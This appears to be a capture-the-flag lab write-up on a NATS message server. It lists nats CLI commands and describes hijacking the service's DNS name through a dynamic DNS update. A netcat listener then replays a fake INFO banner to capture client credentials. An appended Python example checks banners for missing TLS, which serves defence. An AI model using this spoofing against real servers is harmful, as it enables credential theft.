NATS
To get account info:
└─$ nats account info -s nats://$IP:4222 --user $USER --password '$PASS'
To list streams:
└─$ nats stream ls -s nats://$IP:4222 --user $USER --password '$PASS'
To view a stream:
└─$ nats stream -s nats://$IP:4222 --user $USER --password '$PASS' view
Hijacking nats-svc.mirage.htb via Dynamic DNS Update
└─$ nc nats-svc.mirage.htb 4222
INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":832,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}
-ERR 'Authentication Timeout'
We started a listener on port 4222 (the default NATS port):
└─$ echo 'INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":280,"client_ip":"10.129.248.59","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}' | nc -lvnp 4222
listening on [any] 4222 ...
#tldr
This sends a fake INFO banner (expected by NATS clients).
We're using Netcat (nc) to passively accept connections and reply.
Hijack nats-svc.mirage.htb via Dynamic DNS
This sends a DNS dynamic update, making nats-svc.mirage.htb resolve to our IP (10.10.16.7) instead of the real NATS server.
⚠️ Requires that the DNS server allows "nonsecure and secure" dynamic updates (as stated in the incident report).
After some time, we will receive the credentials.
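The hijack works because the client answers the INFO banner with a CONNECT carrying a cleartext password over a non-TLS session. As an added example (not part of the original notes), here is a client-side check in Python that parses the INFO line captured above and refuses to send credentials unless the server requires TLS; the hardened banner and its nonce value are constructed for comparison.

```python
import json

# INFO banner as captured on the page (the same line the fake nc listener replays).
# It carries no "tls_required": true, so a client that answers it with a CONNECT
# containing user/pass hands those credentials to whoever answered on port 4222.
CAPTURED_INFO = ('INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F",'
                 '"server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F",'
                 '"version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2",'
                 '"host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,'
                 '"max_payload":1048576,"jetstream":true,"client_id":832,'
                 '"client_ip":"10.10.16.7",'
                 '"xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}\r\n')

# Constructed counter-example: what a server enforcing TLS and NKey auth advertises.
HARDENED_INFO = ('INFO {"server_id":"EXAMPLE","server_name":"nats-svc.mirage.htb",'
                 '"version":"2.11.3","proto":1,"auth_required":true,"tls_required":true,'
                 '"nonce":"constructed-nonce","max_payload":1048576}\r\n')


def parse_info(line: str) -> dict:
    """Parse a NATS 'INFO {json}' control line into a dict (ValueError if malformed)."""
    line = line.strip()
    if not line.startswith("INFO "):
        raise ValueError("not a NATS INFO line")
    return json.loads(line[len("INFO "):])


def credential_send_allowed(info: dict) -> tuple[bool, list[str]]:
    """Decide whether a client may answer this INFO with a CONNECT that carries a
    password or token. server_id, xkey and version can all be copied verbatim by an
    impostor (that is exactly what the nc listener above does), so the check that
    actually protects the secret is that the session is upgraded to verified TLS first."""
    problems = []
    if not info.get("tls_required"):
        problems.append("server does not require TLS: CONNECT would send credentials in cleartext")
    if info.get("auth_required") and "nonce" not in info:
        # nats-server only sends a nonce when NKey/JWT auth is configured, so its
        # absence means the client will be asked for a static password or token.
        problems.append("no nonce offered: authentication will be password/token based")
    return (not problems, problems)


if __name__ == "__main__":
    for banner in (CAPTURED_INFO, HARDENED_INFO):
        ok, why = credential_send_allowed(parse_info(banner))
        print("send credentials:" , ok, why)
```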